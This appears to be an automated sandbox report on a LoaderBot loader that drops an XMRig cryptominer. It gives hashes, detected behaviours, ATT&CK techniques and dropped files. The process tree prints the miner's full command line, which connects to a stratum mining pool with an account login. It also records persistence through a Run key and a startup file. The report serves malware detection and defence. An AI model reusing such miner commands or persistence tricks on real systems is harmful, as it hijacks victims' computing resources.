Overview

overview

10

Static

static

31266b2b81...2e.exe

windows7_x64

10

31266b2b81...2e.exe

windows10-2004_x64

10

Analysis

  • max time kernel
    167s
  • max time network
    176s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-06-2022 00:15

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    31266b2b81192e3794cbbc3340545f10d57c4a327814cfdff35c1560de352c2e.exe

  • Size

    2.7MB

  • MD5

    5af6f9cfc9e093a49b9120cfa4ad66f3

  • SHA1

    75dab6481ac8d41fdb02d1c88bdc0636b68accea

  • SHA256

    31266b2b81192e3794cbbc3340545f10d57c4a327814cfdff35c1560de352c2e

  • SHA512

    8340c80b61c18b06b3c8ae02b9e96df99ae77a40634679490ee0b7a6a597d73659808c66d64fe63aa3f48de52b9689519684ae27ab2cc668d6a26fbde32b4348

Score
10/10
loaderbotxmrigloaderminerpersistence

Malware Config

Signatures

  • LoaderBot

    LoaderBot is a loader written in .NET downloading and executing miners.

    loaderminerloaderbot
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Detected Stratum cryptominer command 1 IoCs

    Looks to be attempting to contact Stratum mining pool.

    miner
  • LoaderBot executable 1 IoCs
  • XMRig Miner Payload 3 IoCs
    miner
  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

    miner
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\31266b2b81192e3794cbbc3340545f10d57c4a327814cfdff35c1560de352c2e.exe
    "C:\Users\Admin\AppData\Local\Temp\31266b2b81192e3794cbbc3340545f10d57c4a327814cfdff35c1560de352c2e.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Adds Run key to start application
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: RenamesItself
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2632
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o stratum+tcp://xmr.pool.minergate.com:45700 -u tawervladislav@mail.ru -p x -k -v=0 --donate-level=1 -t 1
      2⤵
      • Detected Stratum cryptominer command
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3736

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    Filesize

    3.5MB

    MD5

    cf36d20a96903fb4d0e92eb4fe873ab8

    SHA1

    c789a22bd215bfc2a698fda1295f295745f34d35

    SHA256

    d38ee5052fa13de8b3db050fe84fb89e7946446e2cd5b826fbd31792e406aae2

    SHA512

    d117cecf9ef9d1f2aab1bd80f6947872c8cc8e18a36ce41f1cb25b1fac008e9c5fae7f0f0093f78835b3967582f7556fd626fd8c8c1fa32d41359ef0206e9535

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
    Filesize

    3.5MB

    MD5

    cf36d20a96903fb4d0e92eb4fe873ab8

    SHA1

    c789a22bd215bfc2a698fda1295f295745f34d35

    SHA256

    d38ee5052fa13de8b3db050fe84fb89e7946446e2cd5b826fbd31792e406aae2

    SHA512

    d117cecf9ef9d1f2aab1bd80f6947872c8cc8e18a36ce41f1cb25b1fac008e9c5fae7f0f0093f78835b3967582f7556fd626fd8c8c1fa32d41359ef0206e9535

    Download Submit
  • memory/2632-133-0x00000000008E0000-0x0000000000FFA000-memory.dmp
    Filesize

    7.1MB

    Download
  • memory/2632-130-0x00000000008E0000-0x0000000000FFA000-memory.dmp
    Filesize

    7.1MB

    Download
  • memory/2632-134-0x0000000006E90000-0x0000000006EF6000-memory.dmp
    Filesize

    408KB

    Download
  • memory/2632-132-0x00000000008E0000-0x00000000008E2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2632-131-0x00000000008E0000-0x0000000000FFA000-memory.dmp
    Filesize

    7.1MB

    Download
  • memory/3736-135-0x0000000000000000-mapping.dmp
    Download
  • memory/3736-138-0x0000000140000000-0x00000001404AB000-memory.dmp
    Filesize

    4.7MB

    Download
  • memory/3736-139-0x00000000001E0000-0x00000000001F0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/3736-140-0x0000000000000000-0x0000000000200000-memory.dmp
    Filesize

    2.0MB

    Download
  • memory/3736-141-0x0000000140000000-0x00000001404AB000-memory.dmp
    Filesize

    4.7MB

    Download
  • memory/3736-142-0x0000000000000000-0x0000000000200000-memory.dmp
    Filesize

    2.0MB

    Download